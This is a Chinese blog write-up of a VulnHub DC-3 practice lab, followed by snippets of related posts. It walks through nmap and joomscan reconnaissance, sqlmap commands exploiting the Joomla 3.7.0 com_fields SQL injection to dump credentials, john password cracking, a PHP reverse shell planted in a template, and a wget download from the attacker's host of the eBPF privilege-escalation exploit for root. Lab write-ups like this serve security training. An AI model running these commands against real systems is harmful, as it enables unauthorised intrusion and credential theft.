DC-3靶场渗透测试

最新推荐文章于 2025-03-30 11:03:05 发布
最新推荐文章于 2025-03-30 11:03:05 发布
阅读量438 收藏 1
点赞数 1
分类专栏: 渗透测试 SQLmap 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70489261/article/details/129629328
版权

鸡汤来咯~~~~

前言:

靶场链接:https://download.vulnhub.com/dc/DC-3-2.zip.torrent

脚本链接:https://pan.baidu.com/s/1iPx2VaagNfwZVYfFHmkuew

提取码:8888

--来自百度网盘超级会员V3的分享

下载导入虚拟机把桥接改成NAT模式,把桥接改成NAT模式,把桥接改成NAT模式重要的事情说三遍!

注:这只是一个靶场只提供参考,勿要真实模拟

一.信息收集

  1. 主机扫描

nmap -sP 192.168.115.0/24

nmap扫出目标主机:192.168.115.143,接下来对目标主机进行端口扫描查看开放端口。

  1. 端口扫描

nmap -sV -A 192.168.115.143

开放了80端口,且我们可以看见此靶场用的是Joomla的cms。这里继续进行下一步,开始扫描目录。

  1. 目录扫描

dirsearch -u 192.168.115.143 -e * -x 403 --random-agent

我们发现这个页面貌似是一个登录框界面,咱们进行页面探针试试。

  1. web页面探针

在目录下的/README.txt目录下还查看到了cms的版本3.7

二.漏洞查找

  1. joomscan扫描

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具。

joomscan -u 192.168.115.143

扫出joomla版本 3.7.0 以及页面目录下的登录界面。

2.searchsploit搜索

searchsploit是一款搜索漏洞的工具

searchsploit joomla 3.7.0

结果显示joomla3.7.0版本存在SQL注入以及css跨站脚本漏洞。查看SQL注入完整的pant。

这里我已经复制过了,正常是不会显示/root/桌面/xxx.txt.

将文件路径复制到桌面上

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/桌面/42033.txt

在kali桌面上打开文件,文件给出了SQL注入点以及SQLmap的使用方式。既然给了使用方法,那么就直接用SQLmap跑库吧。~~~吃瓜吃瓜

三.漏洞利用

  1. SQL注入之sqlmap

1.1.跑库名
sqlmap -u "http://192.168.115.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

跑出数据库的5个库名。(这里因为时间原因我就不一个一个跑了,)

1.2.跑指定数据库所有表名
sqlmap -u "http://192.168.115.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --batch -D joomladb –tables

经过之前的靶场测试经验得出,重要的东西在熟悉的users表里。

1.3.查看user字段内容
sqlmap -u "http://192.168.115.143 /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb

经过前几次的经验得出password和username是用户存放账号和密码的,继续往下查看。

1.4.查看用户密码
sqlmap -u "http://192.168.115.143 /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' -C username,password –dump

可看出密码进行过哈希加密,这里我们将密码复制下来存放在一个文件里。

  1. 密码爆破

将密码复制到文件夹内。

使用john工具进行解密

得出密码:snoopy

知道了账号密码进行尝试登录.

成功进入后台。

  1. 反弹shell

根据图片显示,我们找到了一个文件上传漏洞,在这个界面可以新建文件,这里我们上传php脚本用kali进行监听进行反弹shell。

脚本写好之后点击保存。在kali进行监听(图片显示的IP地址是kali地址,不要写错了哦)

设置好监听后,我们在网页访问刚刚写的脚本文件,

ip地址/templates/beez3/shell.php

监听成功。~~~吃瓜吃瓜

四.提权

这里我们发现不管干什么都受权限限制,因为这里不能用suid和git提权。试试查看一下其他的能看的信息。

  1. 查看操作系统

tac /etc/issue  
cat /proc/version

   得出了操作系统以及版本信息,接下来我们可以用这些信息用searchsploit进行搜索相关可利用漏洞。

  1. 搜索操作系统与其版本信息

searchsploit Ubuntu 16.04

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式。

3.下载脚本

利用cp命令拷贝到桌面。

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root/桌面/39772.txt

打开该文件,在文件的末尾段 它提示我们去github上下载一个压缩包,这里我们去GitHub上下载发现文件已经过期了,我们可以去网上找出这个文件下载到自己的电脑上,这里我将它放在了kali里的/var/www/html目录下。

这里我已经将它解压过了。

回到目标靶机,利用wget命令将39772目录下的exploit.tar压缩脚本文件下载到目标靶机中。

wget http://192.168.115.141/39772/39772/exploit.tar

下载后利用tar -xvf对脚本文件进行解压

tar -xvf exploit.tar

4.脚本利用

接着cd进入解压后的文件夹

cd ebpf_mapfd_doubleput_explot

文件告诉你如何执行,linux下.(点)代表执行某个文件的意思。

./compile.sh
./doubleput

5.拿下flag

过程可能会有点慢

执行完脚本权限就直接提升上来了

直接进入root目录,看见了flag,打开->收工->关机->~~~吃瓜

本文到这里就结束了~~睡觉睡觉~~~

(要是本文有不懂的地方或者有错误的地方希望各位在评论区留言,博主会多多改进的。)

DC3靶机渗透测试
Huangshanyoumu的博客
04-16 858
文章目录环境版本:开幕雷击:解决方法:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问 ip2.目录扫描及版本扫描3.搜索 joomla 框架对应版本漏洞,并打印详细信息4.使用 SQLmap 对 joomla 的数据库进行攻击5.使用 john 对密码 hash 进行爆破6.登入后台7.使用 nc 反弹 shell8.提权 环境版本: VMware 16 Kali 2021.1(虚拟机) DC-3(虚拟机) 开幕雷击: 导入 DC-3 发现如下提示 IDE 设备(磁盘/CD-ROM)配置不正确
DC-2靶场详细教程
2301_77518341的博客
09-27 2462
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
DC-3靶机渗透
weixin_45349299的博客
01-02 694
title: DC-3靶机渗透详解tags: DC系列靶机categories: 学习笔记。
DC系列靶场DC-3
最新发布
weixin_74778939的博客
03-30 2040
读取命名管道 h 的内容,并将读取的内容传递给一个交互式的Shell,并将标准错误重定向到标准输出。将这个标准输出通过管道传递给 nc 命令,该命令会建立一个到攻击者主机指定端口的网络连接,将远程主机发送回来的数据写入命名管道 h,形成循环以便远程主机可以发送命令到本地系统。对bsms_admin这个表搞了半天,结果这个表的名字应该是 #__bsms_admin,我还以为前面的#和__不用打。跑出来了76个表,观察了一下,里面的bsms_admin和users 表,应该存在着我们想要的信息。
DC-3靶场渗透
一纸荒芜的博客
12-12 3869
DC3靶场打靶记录!
DC-3靶机 渗透测试
她叫常玉莹
07-18 3218
DC-3查看靶机mac地址获取IP地址NmapJooScansqlmapjohn上传Webshellnc反弹提权 DC-3只有一个目标获得root权限,拿到flag。 查看靶机mac地址 00:0C:29:0D:D3:78 获取IP地址 使用arp-scan扫描 得知靶机IP地址 192.168.0.104 Nmap 使用nmap扫描收集靶机信息 nmap -sV -p- 192.168.0.104 看到靶机开放了80端口,访问一下 http://192.168.0.104:80 在wappaly
DC-3靶机渗透测试
weixin_48991458的博客
11-23 4262
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这里有个坑,VMware用户要官网下的第二个镜像才能发现IP地址,这里官方也有说明,可以仔细看一下,这里也贴出来了 两台主机设为NAT模式,靶机需要改一下设置,默认是桥接 开始操作 先信息收集,两台主机在一个局域网下用netdiscover扫起来,在结合mac地址很快就能发现靶机IP 靶机mac地址在虚拟机设置
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第一个练习环境。DC1靶场通常包含一系列的关卡,每一个关卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场通关详细...
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 738
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1093
*4.rbash提权**
渗透测试靶场实战-DC-3
m0_56523504的博客
10-27 693
渗透测试实战-DC-3 一,下载资料 下载链接:https://www.five86.com/dc-3.html 二,环境搭建:靶机:172.16.43.145 攻击机kali:172.16.43.70 三,信息收集 (1)当前网络活跃主机:nmap -sP 172.16.43.0/24 -oN nmap.sP (2)扫描端口服务:nmap -A 172.16.43.141 -p 1-65535 -oN nmap.A 80 好像就开了80端口了 (3)在访问80网址:http://.
DC-3靶机进行渗透测试
zll___的博客
03-13 1040
DC-3靶机进行渗透测试
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 3050
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2608
DC-3靶机渗透测试详细教程
vulnhub靶场DC-3渗透教程(Joomla CMS)
旺仔Sec&blog
06-06 1592
靶机下载链接作者DCAU发布日期2020年4月25日难度中等1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈3、希望有不足之处,欢迎各位师傅点评一下!
靶场DC-3
好好学习
01-12 2792
vulnhub的DC-3靶场
DC-3靶机的渗透学习
里丘~班诺的小屋
10-01 3419
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.133(未知) 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 二、战前准备 2.1IP地址确认 命令:arp-scan -l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,...
Linux DC-2 靶场渗透测试风险规避(漏洞修复建议)
12-07
在进行Linux DC-2靶场渗透测试后,为了确保系统的安全性,需要对发现的漏洞进行修复。以下是一些常见的漏洞修复建议: 1. **更新系统和软件包**: - 定期更新操作系统和所有安装的软件包,以修补已知的安全漏洞。 - 使用包管理工具(如`apt`或`yum`)进行更新: ```bash sudo apt update && sudo apt upgrade -y ``` 2. **禁用不必要的服务**: - 关闭系统中不必要的服务和端口,减少攻击面。 - 使用`systemctl`命令管理服务: ```bash sudo systemctl disable <service_name> sudo systemctl stop <service_name> ``` 3. **配置防火墙**: - 设置防火墙规则,只允许必要的流量通过。 - 使用`ufw`或`iptables`配置防火墙: ```bash sudo ufw allow <port>/<protocol> sudo ufw enable ``` 4. **强化SSH配置**: - 禁用root用户远程登录。 - 更改默认SSH端口。 - 使用密钥认证而不是密码认证。 - 编辑`/etc/ssh/sshd_config`文件: ```bash PermitRootLogin no Port <new_port> PasswordAuthentication no ``` 5. **设置强密码策略**: - 强制用户设置复杂密码,并定期更换。 - 使用`pam_cracklib`或`pam_pwquality`模块配置密码策略: ```bash sudo apt install libpam-pwquality sudo vi /etc/pam.d/common-password ``` 6. **安装和配置入侵检测系统(IDS)**: - 安装如`Fail2Ban`或`Snort`等工具,监控和阻止可疑活动。 - 配置`Fail2Ban`防止暴力破解: ```bash sudo apt install fail2ban sudo vi /etc/fail2ban/jail.local ``` 7. **日志监控和分析**: - 定期检查系统日志,监控异常活动。 - 使用工具如`Logwatch`或`Splunk`进行日志分析: ```bash sudo apt install logwatch sudo vi /etc/logwatch/conf/logwatch.conf ``` 8. **文件权限和所有权**: - 确保文件和目录的权限和所有权设置正确,防止未授权访问。 - 使用`chmod`和`chown`命令修改权限和所有权: ```bash sudo chmod 644 <file> sudo chown <user>:<group> <file> ``` 9. **数据备份和恢复**: - 定期备份重要数据,并测试恢复过程。 - 使用工具如`rsync`或`tar`进行备份: ```bash sudo rsync -av --delete /data /backup ``` 通过以上措施,可以有效降低Linux DC-2靶场渗透测试中暴露的风险,确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我只希望逃之夭夭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值